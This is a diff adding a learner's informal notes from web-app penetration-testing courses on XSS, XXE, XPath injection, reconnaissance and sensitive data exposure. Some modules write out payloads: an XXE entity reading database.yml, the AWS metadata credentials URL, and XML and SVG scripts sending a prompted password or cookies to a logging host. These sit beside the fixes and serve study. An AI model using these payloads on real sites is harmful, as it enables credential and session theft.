+See  module-4-image-1  image
+
+
+Protect in transit
+No URL
+Expire
+
+
+
+
+::  Access Controls  ::
+Insecure direct object reference
+NEVER security through obscurity!!
+Unprotected API calls

src/Security/Training/Phase1/111_Web Application Penetration Testing Fundamentals/module-5 - Attacking Application Inputs.txt

@@ -0,0 +1,35 @@
+Overview:
+    -- Proxies
+    -- Vehicles of Data Transfer
+    -- Input Validation
+
+
+::  Proxies  ::
+--  Tool(s)  --
+    ZAP  "Lets us view data between the app n server"
+
+
+::  Vehicles of Data Transfer  ::
+GET/POST parameters & response
+Headers
+Coolies
+
+Forms:
+    -- Text
+    -- Hidden fields  [In BURP:  Proxy > Options > Response Modification (Section) > Unhide Hidden Form Fields]
+
+Buttons
+
+Submits
+
+Scripting languages  (JS)
+
+
+
+
+::  Input Validation  ::
+All input is evil. ~sMichael Howard  XD lololololol
+
+TNO: Trust No One
+
+Length, data types, empty or not, etc...

src/Security/Training/Phase1/111_Web Application Penetration Testing Fundamentals/module-6 - Common Attack Methods.txt

@@ -0,0 +1,53 @@
+Overview:
+    -- Fuzzing
+    -- XSS - Cross-site Scripting
+    -- Injection
+    -- Insecure Direct Object Reference
+    -- Request Forgery
+
+
+
+::  Fuzzing  ::
+--  Tool(s)  --
+    Burp
+    ZAP
+
+
+Unexpected Data
+Abnormal Behavior
+
+Upper bounds
+Letter
+Negative number
+XSS -> <script>alert(1)</script>
+
+
+
+
+::  XSS - Cross-site Scripting   ::
+
+Reflected XSS:  Getting data returned from a submission onto a page somewhere like a rely structure
+Stored XSS:     Set data into db to be returned later
+DOM XSS:        Stays client side and based on JS processing
+
+
+
+
+::  Injection  ::
+--  Tool(s)  --
+    -- OWASP:  Security Shepherd
+
+Parameterize! Nuf said
+
+
+
+
+::  Insecure Direct Object Reference  ::
+Basically, can I get to the data directly and bypass page logic??
+
+
+
+
+::  Request Forgery  ::
+CSRF:  Basically, trying to run command from another "site/location" while user is authenticated in the system.
+Instead of being requested from your site and the user directly it can be masked from another site if not checked against

src/Security/Training/Phase1/111_Web Application Penetration Testing Fundamentals/module-7 - Discovering Logic Flaws.txt

@@ -0,0 +1,54 @@
+Overview:
+    -- Circumvention of Workflow
+    -- Beating Limits
+    -- Process Timing
+    -- Spilling the Secrets
+    -- Parameter Manipulation
+
+
+
+::  Circumvention of Workflow  ::
+Breaking logic/algorithms
+Ex 1:
+See  module-7-image-1  image
+
+Ex 2:
+See  module-7-image-2  image
+
+Ex 3:
+See  module-7-image-3  image
+
+Ex 4:
+See  module-7-image-4  image
+
+
+
+
+::  Beating Limits  ::
+min/max checks?
+Less than 0?
+
+
+
+
+::  Process Timing  ::
+Time of day?
+Time to process?
+Time limits?
+
+Success vs error processing?
+
+
+
+
+::  Spilling the Secrets  ::
+Correlation checks
+Does one process decrypt data that another process could use to decrypt other data?
+
+
+
+
+::  Parameter Manipulation  ::
+Site map changes:  See  module-7-image-5  image
+Click and observe
+Understand what COULD be done?

src/Security/Training/Phase1/111_Web Application Penetration Testing Fundamentals/module-8 - Reporting.txt

@@ -0,0 +1,39 @@
+Overview:
+    -- Layout
+    -- Scoring
+
+
+
+::  Layout  ::
+What does it mean in terms of time, cost, threat, etc?
+How does it work?
+How do you remediate it?
+
+Explain according to user. IE, who is reading it technical or non-technical?
+
+Summery:
+    High
+    Medium
+    Low
+
+Scope of work:
+    Targets
+    Limits
+    Schedule
+    Summary of findings
+
+Findings:
+    Description of issue
+    Location
+    Severity rating
+    Screenshot
+    Remediation advice
+
+
+
+
+::  Scoring  ::
+Vulnerability Severities Metric:
+    (FIRST CVSS) --> Forum of Incident Response and Security Teams Common Vulnerability Scoring System.
+    https://www.first.org/cvss/
+    ** "For web application pentesting, I usually don't go beyond the base scoring system."

src/Security/Training/Phase1/2020_Web App Hacking: Hacking XML Processing/Course Overview.txt

@@ -0,0 +1,9 @@
+Concepts:
+    See  module-1-image-1  image
+
+Overview:
+    -- XXE Attack
+    -- Going Deeper into an XXE Attack
+    -- XPath Injection
+    -- XSS via XML
+    -- XSS via SVG

src/Security/Training/Phase1/2020_Web App Hacking: Hacking XML Processing/module-1 - XXE Attack.txt

@@ -0,0 +1,51 @@
+Overview:
+    -- Understanding XXE Attack
+    -- Demo
+    -- Fixing the Problem
+
+
+*** XML external entity attack (XXE)
+
+
+
+::  Understanding XXE Attack  ::
+--  Tool(s)  --
+
+Attacker defines an external entity in an XML file.
+External entity can point to a sensitive file such as database.yml
+The file gets uploaded and processed by the application.
+The content of the sensitive file gets returned.
+
+
+
+::  Demo  ::
+--  Tool(s)  --
+
+
+<!DOCTYPE doctype [
+    <!ENTITY myentity SYSTEM "database.yml">]>
+
+<sell>
+<product>
+<name>Product1</name>
+<price>100</price>
+<description>Description1</description>
+</product>
+<product>
+<name>Product2</name>
+<price>200</price>
+<description>&myentity;</description>
+</product>
+</sell>
+
+
+Entity gets called then runs SYSTEM command
+returning the content to the description field?
+
+
+
+
+::  Fixing the Problem  ::
+--  Tool(s)  --
+
+Disable processing of external entities. XD Oh, ok...

src/Security/Training/Phase1/2020_Web App Hacking: Hacking XML Processing/module-2 - Going Deeper into an XXE Attack.txt

@@ -0,0 +1,22 @@
+Overview:
+    -- Overview
+    -- Stealing the SecretAccessKey of the Application Hosted on AWS
+
+
+
+
+::  Stealing the SecretAccessKey of the Application Hosted on AWS  ::
+--  Tool(s)  --
+
+*** XML externl entaties can point to URLs
+
+Example of sensitive resource in Amazon Web Services:
+http://169.254.169.254/latest/meta-data/liam/security-credentials/s3access
+
+
+
+
+::  Demo  ::
+--  Tool(s)  --
+
+Skipped since same as module 1's

src/Security/Training/Phase1/2020_Web App Hacking: Hacking XML Processing/module-3 - XPath Injection.txt

@@ -0,0 +1,31 @@
+Overview:
+    -- Understanding XPath Injection
+    -- Demo
+    -- Fixing the Problem
+
+
+
+
+::  Understanding XPath Injection  ::  &&  ::  Demo  ::
+--  Tool(s)  --
+
+
+XPATH = XML Path Language
+
+*** Changing the logic of the underlying xpath query.
+
+Ex:
+    //coupon[code='ABCD']  <-- normal
+
+    //coupon[code='ABCD'']  <-- added a  '  to the string generating xpath syntax
+
+    //coupon[code='ABCD' or '*']  <-- Makes valid syntax
+
+
+
+
+::  Fixing the Problem  ::
+--  Tool(s)  --
+
+Validate the data server side to insure the code is alphanumeric.
+This means '' and * wont be accepted.

src/Security/Training/Phase1/2020_Web App Hacking: Hacking XML Processing/module-4 - XSS via XML.txt

@@ -0,0 +1,48 @@
+Overview:
+    -- Understanding XSS Attack
+    -- Understanding XSS via XML
+    -- Demo
+    -- Fixing the Problem
+
+
+
+::  Understanding XSS Attack  ::
+--  Tool(s)  --
+
+Executing scripts that get returned to the user.
+ED, getting cookies, etc.
+
+
+
+
+::  Understanding XSS via XML  ::  &&  ::  Demo  ::
+--  Tool(s)  --
+
+Making special script tag that gets run and sends entered password from user.
+
+<xhtml:html xmins:xhtml="http://www.w3.org/1999/xhtml1">
+<xhtml:script>
+    var pass = prompt("Enter your password to continue");
+    var xhr  = new XMLHttpRequest ();
+    xhr.open("GET", "https: //hacking-web-applications.com/log.php?pass="+
+                                                      encodeURI(pass) ) ;
+    xhr.send();
+</xhtml:script>
+</xhtml :html>
+
+
+
+
+::  Fixing the Problem  ::
+--  Tool(s)  --
+
+Make sure that the script included in the XML file is not executed
+     v
+Send the following response header:
+     Content-Disposition: attachment; filename="<yourfilename>"
+
+
+*** Tells the browser that it's not like an HTML file that needs to be processed.
+    Its an attachment file so should be downloaded.
+    Basically, it's like the parameterize argument in that the thing never gets
+    in a processing context.

src/Security/Training/Phase1/2020_Web App Hacking: Hacking XML Processing/module-5 - XSS via SVG.txt

@@ -0,0 +1,32 @@
+Overview:
+    -- Understanding XSS via SVG
+    -- Demo
+
+
+
+::  Understanding XSS via SVG  ::
+--  Tool(s)  --
+
+SVGs are XML based image files.
+Scripts can be included in the file.
+
+
+
+
+::  Demo  ::
+--  Tool(s)  --
+
+
+*** Fix again is setting content disposition header to be attachment.
+
+<svg xmlns="http://www.w3.org/2000@/svg" >
+<rect width="300" height="200" fill="#ddd"></rect>
+<line x1="50" y1="100" x2="250" y2="160" stroke="blue" stroke-width="8" />
+
+<script>
+    var xhr = new XMLHttpRequest();
+    xhr.open("GET", "https://hacking-web-applications.com/log.php?" +
+                                        encodeURI(document.cookie) );
+    xhr.send();
+</script>
+</svg>

src/Security/Training/Phase1/333_Play by Play - Ethical Hacking/Course Overview.txt

@@ -0,0 +1,3 @@
+Overview:
+    -- Session Hijacking via Cross-site Scripting (XSS)
+    -- Hacker Hardware

src/Security/Training/Phase1/333_Play by Play - Ethical Hacking/module-1 - Session Hijacking via Cross-site Scripting (XSS).txt

@@ -0,0 +1,51 @@
+Overview:
+    -- Reflected Cross-site Scripting
+    -- How Can Users and Developers Mitigate Reflected XSS Risks?
+    -- Persistent Cross-site Scripting
+    -- How Can Users and Developers Combat Persistent XSS?
+
+
+
+::  Reflected Cross-site Scripting  ::
+Uses a link with an image that has a src attrib set to the website he owns.
+He also uses JS to access the cookies and steal the session id and pass that
+to the site called. This is predicated on the user also having set the
+"remember me" functionality which further exacerbated the issue b/c the serer
+sent back OTHER cookies that turned out to be the username and password in
+base64 encoding...
+
+
+
+::  How Can Users and Developers Mitigate Reflected XSS Risks?  ::
+
+Users:
+Pretty much user side the only mitigation is having a unique password.
+
+
+Admins:
+Encode Output
+Auth cookie needs to be set to httponly (IE, NO JS should access it.)
+CORS
+
+
+
+
+::  Persistent Cross-site Scripting  ::
+Embedded XSS in the db
+--  Tool(s)  --
+    BeEF
+
+Used phishing page in this example to escalate attack
+
+
+
+
+::  How Can Users and Developers Combat Persistent XSS?  ::
+
+Users:
+Look at urls and keylock as needed.
+2-Fac auth
+
+Admins:
+Sanitize data before adding to db
+HTTPS

src/Security/Training/Phase1/333_Play by Play - Ethical Hacking/module-2 - Hacker Hardware.txt

@@ -0,0 +1,14 @@
+Overview:
+    -- USB Compromise with Rubber Ducky
+    -- WiFi Hijacking with the WiFi Pineapple
+
+
+
+::  USB Compromise with Rubber Ducky  ::
+Don't use unknown usbs, lol
+Could change host files; could add reverse shell; could take pictures from cam, etc.
+
+
+
+::  WiFi Hijacking with the WiFi Pineapple  ::
+SEO bump by Google when HTTPS

src/Security/Training/Phase1/444_External Footprinting - Reconnaissance and Mapping/Course Overview.txt

@@ -0,0 +1,12 @@
+Concepts:
+    -- Collect domain names & IP addresses
+    -- Passive and Active Reconnaissance
+    -- Hunting Weak Web Applications
+    -- Mapping your hosts
+
+Overview:
+    -- Welcome to External Footprinting  (Non-technical opportunities)
+    -- Passive Reconnaissance  (Hunting Quietly)
+    -- Active Reconnaissance  (Gathering the goods)
+    -- Prioritizing External Targets  (Feel the heat)
+    -- Countermeasures and Reporting  (Active defense, fun!)

src/Security/Training/Phase1/444_External Footprinting - Reconnaissance and Mapping/module-1 - Welcome to External Footprinting.txt

@@ -0,0 +1,84 @@
+Overview:
+    -- README
+    -- Attack Chains
+    -- Client Interaction
+    -- Getting the Gould
+
+
+
+
+::  README  ::
+--  Tool(s)  --
+
+PTES:    Section 6.1
+
+NEED Kali Linux
+
+-- Welcome to External Footprinting  (Non-technical opportunities)
+-- Passive Reconnaissance  (Hunting Quietly)
+-- Active Reconnaissance  (Gathering the goods)
+-- Prioritizing External Targets  (Feel the heat)
+-- Countermeasures and Reporting  (Active defense, fun!)
+
+
+
+::  Attack Chains  ::
+--  Tool(s)  --
+
+Attempt:
+Identify unmaintained site
+Identify SQL injection after login
+Replay new credentials on main website
+
+Result:
+Gain access to an account
+Dump the database, passwords stored in cleartext
+Gain domain access
+
+
+
+
+::  Client Interaction  ::
+--  Tool(s)  --
+
+Statement of Work (SOW):  Legally binding document
+    Target list:
+        -- Explicit host or IP list
+            *10.0.0.0/24
+            host.company.com
+        -- Implicit
+            "Acme HR Application"
+    Scope of Work:
+        -- Web application assessment (min/max components)
+        -- odd requests such as off hour testing
+
+Kickoff Call:
+    Ownership of hosts:
+        If for instance on AWS need permission to test that
+    Overview of targets:
+    Discuss defensive countermeasures
+        WAF (Web Application Firewall)?
+
+Ask questions! Maintain goals
+
+
+
+
+::  Getting the Gould  ::
+--  Tool(s)  --
+Virtual Hosts:  Multiple domain names map to single IP. Valuable in that when
+                one app is insecure it can undermine the other apps security
+
+*** When looking for domain names, it's really common to find copied development
+    versions of a website on the internet.
+Ex:  staging.customer.com  (most common target b/c of less defenses.)
+     dev.customer.com
+     dev2.customer.com
+
+Note:  Defense might be to map against external vs internal IP. IE, using company or VPN IP
+
+
+---   TESTING FACEBOOK   ---
+Hostenames, IPs, reconnaisance
+Must Read:
+    https://www.facebook.com/whitehat

src/Security/Training/Phase1/444_External Footprinting - Reconnaissance and Mapping/module-2 - Passive Reconnaissance.txt

@@ -0,0 +1,130 @@
+Overview:
+    -- WHOIS
+    -- BGP
+    -- Internet Scanning Projects
+    -- DNS Bruteforcing
+    -- Digging Deep on Third Party Servers
+    -- Source Code Services
+
+    ---   TESTING FACEBOOK   ---
+    Hostenames, IPs, reconnaisance
+    Must Read:
+        https://www.facebook.com/whitehat
+
+
+*** Collecting information about the company without communicating with any of their systems.
+
+[  Challenge  ]:
+    --  Tool(s)  --
+        Kali Linux
+
+    Start with:
+        -- facebook.com
+    End with:
+        -- +100,000 IPv4
+        -- +100 IPv6 Ranges
+        -- More than 5k hostnames
+
+
+
+::  WHOIS  ::
+--  Tool(s)  --
+    dmitry: Demographic Information Gathering Tool  -- See  module-2-image-1  image
+    whois:  Gets the company info
+    nslookup:   DNS lookup
+    ARIN Site
+
+
+Is a protocol that translates URL to company information
+Go from a URL to list of IP addresses.
+Associated anonymous system information (ASN Info)
+*** Can use IPs to bypass some information hiding services against WHOIS lookups (see nslookup to get ip/domain)
+
+
+seed URL:         facebook.com
+WHOIS lookups:
+                  +100,000 IPv4
+                  +100 IPv6 Ranges
+
+
+
+
+::  BGP  ::  (Border Gateway Protocal)
+*** Exchanges antonymous system network routing information
+    (Ie, creates A PATH BETWEEN THESE SYSTEMS)
+    Routing decisions on core internet
+*** AS (antonymous system) is associated with network ranges
+
+--  Tool(s)  --
+    See  module-2-image-2  image
+
+
+
+
+::  Internet Scanning Projects  ::
+*** Internet scanning projects perform TCP and UDP port scans across the entire internet on a daily or weekly basis.
+    The data is then made publicly available and the goal is to provide the public with the data for analysis.
+    IE, great for gathering info/reconnaissance
+
+--  Tool(s)  --
+    scans.io : Hosted and maintained by University of Michigan
+               censys.io  allows for interactive querying against data
+        Relevant to Footprinting:
+            DNSs:              Virtual Hosts
+            SSL Certificates:  Subject alternative names (another list of hostnames)
+            Live Services
+    commoncrawl.org:  crawl of the internet itself. (Kinda like backend of Google)
+    www.shodan.io
+    crt.sh:  Comodo Certificate sdearch
+    pigz:  parallel decompression of tar,gzip files
+
+
+
+
+::  DNS Bruteforcing  ::
+--  Tool(s)  --
+    DNSRecon on Kali:  dnsrecon -d <your domain> -t <types: brt for bruteforce> -n 8.8.8.8 -D <dictionary> -c <store results path file> -f <if dns wildcard in place>
+    Fierce on Kali
+
+Advanced Tactics:
+    Recursive Bruteforce
+    Use organization  specific patterns.
+    Ask someone
+
+
+
+
+::  Digging Deep on Third Party Servers  ::
+(Think like an attacker)
+(Think like an employee)
+
+*** Think of the two sites as philosophy than actual steps.
+    Does it make sense to check these basically?
+
+--  Tool(s)  --
+    virustotal.com :  Might list domains checked by users. (When OK they are acrtual domains of company)
+    threatcrowd.org : Malware threat information
+
+
+Think about 3rd party services.
+Think about mergers and acquisitions.
+Think about presentation sharing sites such as slideshare.net or prezi.com
+Industry blog posts
+Conference videos
+
+Other Courses:
+    Reconnaissance/Footprinting by Dale Meredith
+
+
+
+
+::  Source Code Services  ::
+--  Tool(s)  --
+    Gitrob
+    Gumbler
+
+--  Group(s)  --
+    Github
+    Bitbucket
+    SourceForge
+    Googlecode (Now defunct)

src/Security/Training/Phase1/444_External Footprinting - Reconnaissance and Mapping/module-3 - Active Reconnaissance.txt

@@ -0,0 +1,121 @@
+Overview:
+    -- Port Scanning
+    -- Nmap Scripting Engine (NSE)
+    -- Screenshooting
+    -- DNS Bruteforcing
+    -- NTP
+    -- SNMP
+
+
+
+::  Port Scanning  ::
+--  Tool(s)  --
+    Nmap
+    Metasploit:  Can "store" data and handle many formats... Postgress SQL as backend
+
+
+Bad Habits:
+Avoid "Kitchen Sink" syndrome! Be precise and DON'T firehose scan everything!
+    It's loud and makes for easy detection.
+    It's extremely slow.
+    Can be greatly misleading given it can be destructive by taking down services.
+
+Good Habits:
+    Perform multiple scans
+    Slow down service scans and target a few at a time.
+    Store scan data effectively
+
+
+Some common NMAP flags used:  See  module-3-image-1  image
+*** Check his notes for common service ports!
+
+
+
+
+::  Nmap Scripting Engine (NSE)  ::
+--  Tool(s)  --
+    Nmap Scanning Engine (NSE):
+        Supports most Nmap protocols
+        Massively parallel
+        Kali ships with 515 NSE scripts
+    Masscan:
+        Scan entire Internet in 6 minutes
+    ZMap:
+        Perform checks similar to NSE
+
+
+
+
+
+::  Screenshooting  ::
+--  Tool(s)  --
+    EyeWitness:  A python script to take snapshots
+                 python EyeWitness.py --headless -x <scan_list>.xml
+
+Scan results or IP with Nmap and then screenshoot.
+
+
+
+
+::  DNS Bruteforcing  ::
+--  Tool(s)  --
+    dig: DNS requests tool
+    dnsrecon: Python script for dns zone transfer checking
+
+In this instance we use company's Domain server instead of 8.8.8.8 or other non related DNS server.
+Remember, in passive scan we NEVER touch anything related to company!! In active scanning,
+we do touch company servers/services...
+
+Active vs. Passive DNS Bruteforcing:
+    See  module-3-image-2  image
+
+
+
+
+::  NTP  ::
+(Network Time Protocol)
+** Time syncing protocol
+
+--  Tool(s)  --
+    Nmap NSE:  ntp-monlist -->  nmap --script ntp-monlist $IP
+    NTP tools:  apt-get install ntp
+
+
+NTPd = daemon
+
+They store devices that have communicated with it.
+If missconfigured, while rare, it can expose those addresses and hostenames
+
+Getting IPs from NTP
+See  module-3-image-3  image
+
+*** mrulist command in pic is most likely to work but no DoS risk
+
+
+
+
+::  SNMP  ::
+(Simple Network Management Protocol)
+*** Manages or monitors devices
+*** Usually for switches and routers but can have Printers and VOIP Phones over internet
+
+--  Tool(s)  --
+
+
+Network Monitoring System (NMS) collects information
+SNOM agent has the actual info to be collected
+
+Spoofing as NMS to try and collect information about network.
+
+Can reveal:
+    Version info, network routing inf, usernames, process IDs, and more
+
+*** If you can modify the device it's an instant critical finding
+   Networking device modification would mean changing internet firewall rules
+   or, with the right device, permanent compromise of the system.
+
+Security of SNPM:
+    3 versions -->  See  module-3-image-4  image
+
+Potential attacks:
+    See  module-3-image-5  image

src/Security/Training/Phase1/444_External Footprinting - Reconnaissance and Mapping/module-4 - Prioritizing External Target List.txt

@@ -0,0 +1,100 @@
+Overview:
+    -- Banner Grabbing
+    -- Hunting Weak Web Applications
+    -- SMTP Bounceback
+    -- SMTP Enumeration
+    -- Username Enumeration - Error Messaging
+    -- Username Enumeration - Timing Attacks
+
+*** Drilling down in prioritized service list
+
+
+
+::  Banner Grabbing  ::
+*** tend to get best results with internal assessments.
+
+--  Tool(s)  --
+
+Automate connections to the servers and scope and pull back the response banner.
+Can sometimes pull back MySQL banner which could give version info.
+
+
+
+
+::  Hunting Weak Web Applications  ::
+--  Tool(s)  --
+    Nmap:  http-enums script (has big dictionary of common pages)
+           *** Look for things like phpMyAdmin pages
+           Can pickup Wordpress versions
+    whatweb: good plugins
+            Can find interesting headers
+    wpscan:  Wordpress scan
+            Enumerate users and plugins
+
+
+
+Look for OTS (Off the Shelf) software
+Pre-packaged install
+Supports plugins
+Open source vs. Vendor specific (Enterprise)...
+Custom developed pages
+
+Talk with customer about patching cycle. Is it under 2 hours?
+Look to Drupal case study where vulnerability left all instances
+not patched within 7 hours as infected.
+
+
+
+
+::  SMTP Bounceback  ::
+*** Sends email to non-existent addess to target email server
+    Target sends a bounceback stating address doesn't exist. (DoS/DDoS threat too?)
+    can view details from the response for useful information
+
+*** Limited effect but can be useful.
+
+--  Tool(s)  --
+
+
+
+
+::  SMTP Enumeration  ::
+*** Can get enterprise or domain accounts
+
+--  Tool(s)  --
+
+SMTP User Enumeration:
+    See  module-4-image-1  image
+
+Can use Metasploit module smtp_enum, included with Kali to automate this process
+
+Defences:
+    White listing, reputation of connecting IPs, disallowing multiple
+    receipt-to attempts and SPF or its counterpart DKIM, which are aimed at preventing spoofed email.
+
+
+
+
+::  Username Enumeration - Error Messaging  ::
+*** Basically, see what error messages give. Does username or password not exist?
+
+--  Tool(s)  --
+
+
+Account Lockouts:
+    Lockout threshold and timeout
+    Lack of lockout is/really/bad
+
+Single password bruteforce
+
+Case Study:
+    See  module-4-image-2  image
+
+
+
+
+::  Username Enumeration - Timing Attacks  ::
+--  Tool(s)  --
+
+Timing Attack Baseline:
+    See  module-4-image-3  image

src/Security/Training/Phase1/444_External Footprinting - Reconnaissance and Mapping/module-5 - Countermeasures and Reporting.txt

@@ -0,0 +1,63 @@
+Overview:
+    -- Countermeasures
+    -- Active Defense
+    -- OPSec
+    -- Reporting
+
+
+
+::  Countermeasures  ::
+--  Tool(s)  --
+
+What is your customer's security posture/maturity?
+What hosts are around? Can it be reduced?
+Perimeter hygiene?
+You vs. You? How would you fight you?
+
+
+
+::  Active Defense  ::
+*** DO NOT HACK BACK! It's illegal. Onlty on your network.
+
+--  Tool(s)  --
+    Portspoof
+    CNAME roulette
+    Canarytokens (Thinkst)
+
+
+Make it annoying/hard against attackers.
+The defense needs to make sense and hide in plain sight.
+
+Some Ablative Techniques:
+    See  module-5-image-1  image
+
+
+
+
+::  OPSec  ::
+*** Protecting info that can be used against you
+
+--  Tool(s)  --
+
+
+Reasonable Paranoia:
+    See  module-5-image-2  image
+
+
+
+
+::  Reporting  ::
+*** The "story" of your pen test
+
+--  Tool(s)  --
+
+People:
+    Executive -->
+    Managers  -->
+    Trenches  -->
+
+Scope
+    Summary findings related to footprinting
+    Technical findings related to footprinting
+    Appendix of all hosts and IPs discovered
+    Whether too many outdated services

src/Security/Training/Phase1/555_Web App Hacking: Sensitive Data Exposure/Course Overview.txt

@@ -0,0 +1,11 @@
+Concepts:
+    ...
+
+Overview:
+    -- Insecure Error Handling
+    -- Disclosure of Sensitive Files
+    -- Information Disclosure via Metadata
+    -- Underestimated Risk: Disclosure of Software Version
+    -- Insecure Communication Channel
+    -- Leakage of Cookie with Sensitive Data
+    -- Leakage of Sensitive Data via Referer Header

src/Security/Training/Phase1/555_Web App Hacking: Sensitive Data Exposure/module-1 - Insecure Error Handling.txt

@@ -0,0 +1,33 @@
+Overview:
+    -- Verbose Error Messages
+    -- How to Trigger Error Message
+    -- Demo
+
+
+
+::  Verbose Error Messages  ::
+-- Tool(s)  --
+
+Can find/see source code
+Credentials to the database
+Details of internal implementation (IE, urls, internal API calls, pathing, etc)
+
+
+
+
+::  How to Trigger Error Message  ::
+-- Tool(s)  --
+
+Triggers:
+    Bad data --> strings, ints, bools, files, etc
+    Encoding types
+    Overflows
+
+
+
+
+::  Demo  ::
+-- Tool(s)  --
+
+He just inserts a string instead of int in the URL. We learn it's an ASP app
+Saw that it gave connection info to the db.

src/Security/Training/Phase1/555_Web App Hacking: Sensitive Data Exposure/module-2 - Disclosure of Sensitive Files.txt

@@ -0,0 +1,36 @@
+Overview:
+    -- How to Find Sensitive Files
+    -- How to Read the Content of Sensitive Files
+    -- Demo
+
+
+
+::  How to Find Sensitive Files  ::
+-- Tool(s)  --
+
+Method:
+    robots.txt  (Boy aint that the truth. WPScan showed me this. XD)
+        Fix:  Setup internal routs and responses.
+              Use maybe internal IP as validation for access/VPN?
+
+
+
+
+::  How to Read the Content of Sensitive Files  ::
+-- Tool(s)  --
+
+Explains a scenario where the robots file shows a PHP file and a config file.
+PHP gets processed but config returns data b/c it's a non-standard file.
+The config file has db creds in plain text...
+    Fix: Use PHP file to setup connection since PHP is processed.
+         Encrypt the user and password too... <-- This doesn't fix it per-say but makes things harder to exploit.
+
+
+
+::  Demo  ::
+-- Tool(s)  --
+
+
+Directory listing is enabled.
+User can access the config path and see the two files.
+Thus, can open the config file.

src/Security/Training/Phase1/555_Web App Hacking: Sensitive Data Exposure/module-3 - Information Disclosure via Metadata.txt

@@ -0,0 +1,37 @@
+Overview:
+    -- Metadata
+    -- How to Extract Metadata
+    -- Demo
+
+
+
+::  Metadata  ::
+("Hidden" data on file)
+--  Tool(s)  --
+
+Info to be found:
+    Comments
+    History of changes
+    GPS coordinates
+    Name
+    Dates edited
+    etc.
+
+
+
+::  How to Extract Metadata  ::
+--  Tool(s)  --
+    Exiftool
+        exiftool -a <your file>
+
+
+
+::  Demo  ::
+--  Tool(s)  --
+
+Used exif tool on a msword file.
+Metadata had comments that gave a link with user and password to a documents archive.
+
+    Fix:  Scrub all metadata out... (But then how are comments preserved?)
+          Better internal policy about information transfer.
+          Maybe give link but no password n user?

src/Security/Training/Phase1/555_Web App Hacking: Sensitive Data Exposure/module-4 - Underestimated Risk: Disclosure of Software Version.txt

@@ -0,0 +1,39 @@
+Overview:
+    -- Disclosure of Software Version
+    -- Exploitation
+    -- Demo
+
+
+::  Disclosure of Software Version  ::
+--  Tool(s)  --
+    Wpscan
+
+Disclosure Methods:
+     Response headers
+     JS versions
+     Config files
+     etc
+
+
+
+
+::  Exploitation  ::
+--  Tool(s)  --
+    Exploit Database:  https://www.exploit-db.com   (Find and download exploit)
+
+Exploitation
+    Apache/2.2.22
+    PHP/5.3.10-1ubuntu3
+
+
+
+
+::  Demo  ::
+--  Tool(s)  --
+    Firebug
+
+Check if response headers disclose software versions.
+Uses Firebug to look at Net tab and then the response headers.
+Sees the version info and  uses https://www.exploit-db.com  to get exploit
+Uses exploit to ls remote directory.
+He the writes to the index.php file trashing the site with "You are hacked".

src/Security/Training/Phase1/555_Web App Hacking: Sensitive Data Exposure/module-5 - Insecure Communication Channel.txt

@@ -0,0 +1,57 @@
+Overview:
+    -- HTTP vs. HTTPS
+    -- Demo: HTTP vs. HTTPS
+    -- HTTPS
+    -- Problems with Transport Layer Protection
+    -- Demo: Problems with Transport Layer Protection
+
+
+
+
+::  HTTP vs. HTTPS  ::
+--  Tool(s)  --
+
+Http is insecure
+Https is secure
+Data is exposed...yada yada yada
+
+
+::  Demo: HTTP vs. HTTPS  ::
+--  Tool(s)  --
+
+Uses proxy to view data from http site and user creds
+
+
+
+
+::  HTTPS  ::
+--  Tool(s)  --
+XD Sorry, duh stuff at this point...
+
+
+
+::  Problems with Transport Layer Protection  ::
+(Basically, could be using poor encryption standards... Thanks NSA)
+--  Tool(s)  --
+    Scanner For Transport Layer Protection
+        https://www.ssllabs.com/ssltest/
+
+Insecure protocols
+    SSL3  <-- Vulnerable against POODLE attack  <-- This guy fucking with me? XD
+
+Insecure ciphers
+    TLS_RSA_WITH_RC4_128_SHA
+
+Vulnerable libraries
+    Heartbleed
+
+
+
+
+::  Demo: Problems with Transport Layer Protection  ::
+--  Tool(s)  --
+
+He uses  https://www.ssllabs.com/ssltest/  scanner to check his vulnerable site.
+He uses suggest documents to mitigate potential threats through its instructions.
+
+One could likely use https://www.exploit-db.com  to Find and download exploit...

src/Security/Training/Phase1/555_Web App Hacking: Sensitive Data Exposure/module-6 - Leakage of Cookie with Sensitive Data.txt

@@ -0,0 +1,42 @@
+Overview:
+    -- Importance of Secure Cookie Processing
+    -- Cookie Processing Fundamentals
+    -- Secure Attribute
+    -- Demo
+
+
+
+::  Importance of Secure Cookie Processing  ::
+--  Tool(s)  --
+Leakage of session ID through cookie leads to user impersonation
+Two-fac does not protect against session ID loss/leak
+
+
+
+
+::  Cookie Processing Fundamentals  ::
+--  Tool(s)  --
+
+Set-Cookie  <-- Header from server which creates cookie
+Format:
+    Name
+    Value
+    Optional Attributes
+
+
+
+::  Secure Attribute  ::
+--  Tool(s)  --
+
+Set-Cookie:  name=value  <-- sent over HTTP and HTTPS
+Set-Cookie:  name=value;secure  <-- sent ONLY over HTTPS
+
+
+
+
+::  Demo  ::
+--  Tool(s)  --
+
+Uses test app and looks at cookies info. Sees httponly and secure are unset.
+Gets redirected from http to https. The cookie was set and disclosed b4 redirect.
+He sets the secure attribute through his browser for example but the sessionid is undesclosed.

src/Security/Training/Phase1/555_Web App Hacking: Sensitive Data Exposure/module-7 - Leakage of Sensitive Data via Referer Header.txt

@@ -0,0 +1,49 @@
+Overview:
+    -- Password Reset Link
+    -- Leakage via Referer Header
+    -- Demo
+    -- Fixing the Problem
+
+
+
+::  Password Reset Link  ::
+--  Tool(s)  --
+
+Common Link Structures:
+    <domain>/reset.php?token=kj5h9gf7ed8rf89tjhg
+    "BAD":
+        <domain>/reset.php?userID=3451&token=kj5h9gf7ed8rf89tjhg
+        Token should be unique to userID and id shouldn't be used.
+
+
+
+
+::  Leakage via Referer Header  ::
+--  Tool(s)  --
+
+When browser fetching say an image, it makes a call to the link.
+Users password reset link is transferred to external domain
+The referer domain leaks the link. But, if it had the ID too
+then a hacker could use that too.
+
+Fix: Change the referer domain? Expire reset links in a timly manner...
+
+
+
+::  Demo  ::
+--  Tool(s)  --
+
+--  Link(s)  --
+    https://silesiasecuritylab.com/
+
+
+Looks at referer info from image call.
+
+
+
+
+::  Fixing the Problem  ::
+--  Tool(s)  --
+
+Don't fetch the content from an external domain.
+Host it yourself. At least on the reset link and login links...

src/Security/Training/Phase1/666_Web App Hacking: Cookie Attacks/Course Overview.txt

@@ -0,0 +1,9 @@
+Concepts:
+    ...
+
+Overview:
+    -- Leakage of Cookie with Sensitive Data
+    -- Cookie Hijacking
+    -- Weaknesses in Cookie Lifecycle
+    -- Underestimated Risk: XSS via Cookie
+    -- Remote Cookie Tampering

